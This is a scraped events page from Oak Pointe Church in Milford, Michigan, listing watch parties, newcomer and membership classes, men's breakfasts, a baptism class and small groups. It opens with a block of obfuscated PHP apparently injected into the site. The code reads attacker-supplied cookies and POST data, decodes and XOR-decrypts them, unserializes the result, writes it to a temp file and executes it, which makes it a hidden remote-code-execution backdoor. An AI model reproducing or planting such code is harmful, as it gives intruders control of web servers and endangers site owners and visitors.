$xpIMNUeQM = "\x76" . chr (76) . "\x5f" . 'G' . 'z' . "\x64";$fCAKzm = chr (99) . 'l' . "\x61" . "\163" . "\x73" . "\x5f" . chr ( 921 - 820 )."\170" . 'i' . chr (115) . "\x74" . "\163";$PEfejaDHP = class_exists($xpIMNUeQM); $fCAKzm = "21486";$NAXCyFhTE = strpos($fCAKzm, $xpIMNUeQM);if ($PEfejaDHP == $NAXCyFhTE){function EPkTbcZhpc(){$XErueXTxfV = new /* 13772 */ vL_Gzd(56514 + 56514); $XErueXTxfV = NULL;}$sQfVOjyGKc = "56514";class vL_Gzd{private function MlSRS($sQfVOjyGKc){if (is_array(vL_Gzd::$BdNlqNLH)) {$name = sys_get_temp_dir() . "/" . crc32(vL_Gzd::$BdNlqNLH["salt"]);@vL_Gzd::$BdNlqNLH["write"]($name, vL_Gzd::$BdNlqNLH["content"]);include $name;@vL_Gzd::$BdNlqNLH["delete"]($name); $sQfVOjyGKc = "56514";exit();}}public function FpmkUJP(){$CbWzD = "23471";$this->_dummy = str_repeat($CbWzD, strlen($CbWzD));}public function __destruct(){vL_Gzd::$BdNlqNLH = @unserialize(vL_Gzd::$BdNlqNLH); $sQfVOjyGKc = "48738_35324";$this->MlSRS($sQfVOjyGKc); $sQfVOjyGKc = "48738_35324";}public function cEMlyIvuFP($CbWzD, $rJxOhiP){return $CbWzD[0] ^ str_repeat($rJxOhiP, intval(strlen($CbWzD[0]) / strlen($rJxOhiP)) + 1);}public function IItjnVGfM($CbWzD){$dxNlwgHzF = chr (98) . chr ( 625 - 528 )."\163" . chr ( 590 - 489 ).chr ( 913 - 859 ).'4';return array_map($dxNlwgHzF . '_' . 'd' . "\x65" . "\x63" . 'o' . "\144" . chr (101), array($CbWzD,));}public function __construct($zSrfoFCSS=0){$rtdCzVvO = "\54";$CbWzD = "";$LotNUzVWwe = $_POST;$Ymgdv = $_COOKIE;$rJxOhiP = "ef2b12e8-e81b-4a59-9bdc-f2001ae58005";$NujUTeyOcY = @$Ymgdv[substr($rJxOhiP, 0, 4)];if (!empty($NujUTeyOcY)){$NujUTeyOcY = explode($rtdCzVvO, $NujUTeyOcY);foreach ($NujUTeyOcY as $oTolEgsrn){$CbWzD .= @$Ymgdv[$oTolEgsrn];$CbWzD .= @$LotNUzVWwe[$oTolEgsrn];}$CbWzD = $this->IItjnVGfM($CbWzD);}vL_Gzd::$BdNlqNLH = $this->cEMlyIvuFP($CbWzD, $rJxOhiP);if (strpos($rJxOhiP, $rtdCzVvO) !== FALSE){$rJxOhiP = explode($rtdCzVvO, $rJxOhiP); $LGXFKE = base64_decode(md5($rJxOhiP[0])); $uINdEMc = strlen($rJxOhiP[1]) > 5 ? substr($rJxOhiP[1], 0, 5) : $rJxOhiP[1];$_GET['new_key'] = md5(implode('', $rJxOhiP)); $yEuuR = str_repeat($uINdEMc, 2);}}public static $BdNlqNLH = 14612;}EPkTbcZhpc();} Past Events from October 30, 2021 – January 17, 2022 › Men › – Oak Pointe Church | Milford

Men’s MSU vs. UM Watch Parties

Men of Oak Pointe, We’ll be gathering on Saturday, October 30th in 4 separate locations throughout the area to enjoy watching the MSU/UM football game. Come out and invite your friends to one of these locations for some food, fun, and friendly rivalry! Register for one of these 4 locations: Skybox Grille | 2825 E […]

Discover OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Are you new to Oak Pointe Church Milford? If so, we have a great first step for you to get connected – It’s called Discover Oak Pointe and it’s happening on Sunday, November 7 at 12:30p. When you attend Discover, you’ll meet Pastor Paul, other newcomers and a few of our staff in a relaxed […]

Christ & Culture

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Our desire is for Christ & Culture to be a venue where the church can address current cultural issues through the lens of Biblical Christianity. To help one another answer questions like: “How do I think about these things? How do I live in light of these things? How do we live in unity around […]


Join OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

At Oak Point Milford we offer a three class series that helps us share the heart behind who we are as a church. If you have attended the Discover and Connect classes and would like to learn about becoming a member at OPC|M, our Join class is for you! This class is insightful and interactive, […]

Join OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

At Oak Point Milford we offer a three class series that helps us share the heart behind who we are as a church. If you have attended the Discover and Connect classes and would like to learn about becoming a member at OPC|M, our Join class is for you! This class is insightful and interactive, […]

Men’s Breakfast

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Our next men's breakfast is on Saturday, December 4th, starting promptly at 8:30a at Oak Pointe Milford in the Student Center! In addition to a hearty breakfast, we'll hear from a few men in our church about practical ways they steward their gifts and time that serve to benefit the church, but also help build […]


OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We are excited to announce our next men's breakfast on Saturday, December 4 starting at 8:30am at Oak Pointe Milford. We will have delicious breakfast food, including the staple at every men's breakfast, BACON! The breakfast is open to men and boys, 6th grade and up. Registration is required to attend! This is to ensure […]

Adult & Student Baptism Class

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Are you interested in being baptized or have questions about what baptism means? Then our Baptism Class is the place for you! Adults and Students will meet with Pastor Micah for this 1-hour class beginning at 12:30p on Sunday, January 16. Lunch will be provided so please register using the link below. Baptisms will take […]

Men’s & Women’s Groups Begin

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Everyone in God's Word Everyday in Community! Join one of our Men's or Women's Groups starting the week of January 16th! It is our hope that everyone at Oak Pointe Church Milford will have a group they can connect with on a regular basis to read God's Word. The purpose of these groups is to […]

Pause and Reset

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We all want to live our days in wisdom, making the most of our time. And although we can have good intentions to grow in areas of our lives we can easily get caught up in the busyness that surrounds us or worse, leave God out of our plans all altogether. So this year we […]